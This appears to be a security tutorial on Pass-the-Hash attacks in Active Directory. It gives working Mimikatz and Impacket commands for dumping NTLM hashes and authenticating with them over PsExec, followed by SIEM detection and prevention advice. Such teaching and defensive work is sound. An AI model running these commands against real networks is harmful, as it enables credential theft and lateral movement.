What is a Pass The Hash Attack?
Pass The Hash is an attack technique in which the attacker steals a user's hashed password and uses that hash to authenticate as the user or service. This technique bypasses the standard authentication step that normally requires the user's original password, allowing attackers seamless entry as though they were legitimate users.
Requirements for a Pass The Hash Attack
- The attacker must have some form of access to the target system, which could be through compromised credentials, phishing, or exploiting vulnerabilities.
- Extracted NTLM hashes.
- Administrative access privileges on the initial compromised system.
Tools Used in a Pass The Hash Attack
- Impacket: A tool written in Python, used for penetration testing network protocols.
- Mimikatz: A powerful open-source tool for extracting credentials from Windows operating systems.
How to perform a Pass The Hash Attack on Active Directory?
Steps to Perform the Attack
Step 1. Dump the NTLM hash of a specific user using DCSync
First, dump the hash of the user account from the Domain Controller (DC). Use Mimikatz for this:
lsadump::dcsync /domain:server.local /user:Rosetta.Jena
This command retrieves the NTLM hash for the specified user.
Alternatively, dump the hashes of all logon credentials stored in the current sessions on the machine using Mimikatz:
privilege::debug
sekurlsa::logonpasswords
Step 2. Perform the Pass-the-Hash Attack
With the required hash in hand, execute the following command in Mimikatz:
privilege::debug
sekurlsa::pth /user:username_here /domain:domain.local /ntlm:hash_here
- /user:username_here: The target username.
- /domain:domain.local: The domain of the target account.
- /ntlm:hash_here: The NTLM hash of the target user.
Step 3. A new command prompt will open automatically
In that terminal, run:
PsExec.exe \\10.0.0.71 cmd.exe
- 10.0.0.71: The IP address of the victim's machine.
OR
Step 1. Using Impacket to perform the Pass The Hash attack
Once you have the NTLM hash, use Impacket to authenticate to the target system:
impacket-psexec 'SERVER/username@IP_HERE' -hashes ':ntlm_hash_here'
- SERVER: The domain of the account (Impacket takes the target as domain/username@host).
- username: The username for which you have the hash.
- IP_HERE: The IP address of the target machine.
- ntlm_hash_here: The NTLM hash obtained from the previous step. The -hashes option expects LMHASH:NTHASH, so the LM half is left empty before the colon.
Troubleshooting Common Errors
Error: “Make sure that the default admin$ share is enabled.”
If you encounter this error, follow one of the solutions below:
Solution 1: Enable the admin$ share.
- Go to C:\Windows.
- Right-click and select Properties.
- Click on Advanced Sharing.
- Check the box for Share this folder.
- Enter the name admin$.
- Click Permissions; it is recommended to remove 'Everyone' and add only the users that PsExec will use for execution.
Solution 2: Ensure the victim user has local administrator privileges on their machine.
How to detect a Pass The Hash attack using a SIEM?
To detect Pass-the-Hash attacks in a SIEM:
- Monitor authentication logs for anomalies (Event ID 4624 for successful logons, 4625 for failed logons).
- Track NTLM authentication.
- Identify the use of administrative tools through process creation events (Event ID 4688).
- Analyse lateral movement patterns and check for anomalous account behaviour.
- Enable alerts for the specific events above, monitor network traffic, and leverage threat intelligence.
- Correlate events across sources, and conduct regular audits and reviews.
How to prevent a Pass The Hash Attack?
- Implement MFA and prefer Kerberos over NTLM for stronger authentication.
- Apply the principle of least privilege and use dedicated admin workstations.
- Keep systems updated with patches and monitor for vulnerabilities.
- Enforce strong password policies and educate users on password hygiene.
- Limit access to critical systems and control lateral movement through segmentation.
- Monitor authentication logs and use Intrusion Detection Systems (IDS).
- Enable Windows Credential Guard and disable NTLM where feasible.
- Conduct regular audits of user accounts and remove unused accounts.
- Provide security awareness training and conduct phishing simulations.
- Use anti-virus solutions and regularly scan endpoints for vulnerabilities.
Conclusion
This guide provides a structured approach to performing a Pass-the-Hash attack using Mimikatz and Impacket in a Windows environment. Always ensure that you have permission to conduct such activities in your network to comply with legal and ethical standards.